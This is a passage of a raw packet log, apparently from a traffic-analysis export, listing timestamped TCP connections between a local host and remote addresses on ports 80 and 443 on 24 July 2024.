                                                                                        Jul 24, 2024 07:14:25.733867884 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.733881950 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.733886003 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.733896971 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.733911991 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.733920097 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.733927965 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.733942986 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.733942986 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.733973980 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.734004974 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.734718084 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.734734058 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.734746933 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.734761953 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.734776020 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.734791040 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.734791994 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.734807014 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.734816074 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.734822989 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.734837055 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.734852076 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.734853029 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.734870911 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.734894991 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.735554934 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.735573053 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.735588074 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.735606909 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.735625982 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.735627890 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.735670090 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.769438028 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.769468069 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.769483089 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.769514084 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.769543886 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.769628048 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.769644976 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.769660950 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.769669056 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.769716978 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.769814968 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.769862890 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.778023958 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778091908 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778103113 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.778110027 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778131962 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.778152943 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.778259993 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778275013 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778305054 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.778323889 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.778477907 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778491974 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778506994 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778516054 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.778542995 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.778716087 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778737068 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778743982 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778752089 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778759003 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778765917 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.778836966 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.779516935 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.779531002 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.779545069 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.779561043 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.779570103 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.779589891 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.779594898 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.779608965 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.779619932 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.779624939 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.779656887 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.779690027 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:25.952672958 CEST49719443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:25.952754021 CEST4434971940.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:25.952987909 CEST49719443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:25.953653097 CEST49719443192.168.2.640.115.3.253
                                                                                        Jul 24, 2024 07:14:25.953682899 CEST4434971940.115.3.253192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.007170916 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.012192965 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.234891891 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.234920979 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.234935999 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.234982014 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.235021114 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.235089064 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.235104084 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.235117912 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.235132933 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.235148907 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.235166073 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.235203028 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.235527992 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.235543013 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.235558033 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.235572100 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.235585928 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.235589981 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.235625982 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.235630035 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.235641003 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.235651970 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.235656023 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.235678911 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.235687017 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.235718966 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.236365080 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.236380100 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.236394882 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.236409903 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.236423969 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.236434937 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.236438990 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.236454964 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.236468077 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.236468077 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.236493111 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.236515999 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.236526966 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.236526966 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.236547947 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.236563921 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.237289906 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.237310886 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.237325907 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.237341881 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.237355947 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.237358093 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.237370968 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.237385988 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.237401009 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.237402916 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.237415075 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.237416029 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.237430096 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.237452984 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.237452984 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.237488031 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.238141060 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.238158941 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.238173008 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.238198996 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.238226891 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.238229990 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.238245010 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.238259077 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.238272905 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.238285065 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.238287926 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.238301992 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.238307953 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.238316059 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.238331079 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.238362074 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.239152908 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.239173889 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.239187002 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.239201069 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.239202976 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.239217997 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.239223003 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.239233017 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.239248037 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.239259958 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.239263058 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.239279032 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.239283085 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.239294052 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.239301920 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.239336014 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.240076065 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.240091085 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.240104914 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.240118027 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.240133047 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.240145922 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.240147114 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.240163088 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.240171909 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.240179062 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.240191936 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.240192890 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.240207911 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.240227938 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.240262985 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.240987062 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.241003036 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.241017103 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.241030931 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.241031885 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.241045952 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.241055965 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.241060972 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.241075993 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.241091967 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.241100073 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.241107941 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.241128922 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.241163969 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.336961031 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.343544006 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559228897 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559258938 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559276104 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559319019 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.559351921 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.559423923 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559438944 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559453964 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559468031 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559475899 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.559487104 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559494019 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.559523106 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.559866905 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559880972 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559895992 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559910059 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559921026 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.559925079 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.559936047 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.559962034 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.560333014 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.560357094 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.560370922 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.560374022 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.560385942 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.560400009 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.560400009 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.560415983 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.560425043 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.560450077 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.560836077 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.560851097 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.560867071 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.560872078 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.560882092 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.560894012 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.560908079 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.560920954 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.561249018 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.561265945 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.561280966 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.561286926 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.561295986 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.561310053 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.561319113 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.561322927 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.561327934 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.561338902 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.561347961 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.561352968 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.561367989 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.561381102 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.561382055 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.561397076 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.561403036 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.561419964 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.561439991 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.562203884 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.562221050 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.562235117 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.562248945 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.562257051 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.562263012 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.562273026 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.562278032 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.562292099 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.562305927 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.562306881 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.562320948 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.562325954 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.562338114 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.562340021 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.562362909 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.562381983 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.563103914 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.563119888 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.563133955 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.563148975 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.563155890 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.563163042 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.563173056 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.563178062 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.563191891 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.563203096 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.563205957 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.563218117 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.563219070 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.563235044 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.563241005 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.563262939 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.563282967 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.564034939 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.564052105 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.564065933 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.564080954 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.564094067 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.564099073 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.564110041 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.564121962 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.564124107 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.564135075 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.564138889 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.564152956 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.564160109 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.564167023 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.564179897 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.564181089 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.564203024 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.564218044 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.565032959 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.565049887 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.565063953 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.565079927 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.565092087 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.565093040 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.565108061 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:26.565118074 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:26.565128088 CEST804971877.91.77.81192.168.2.6
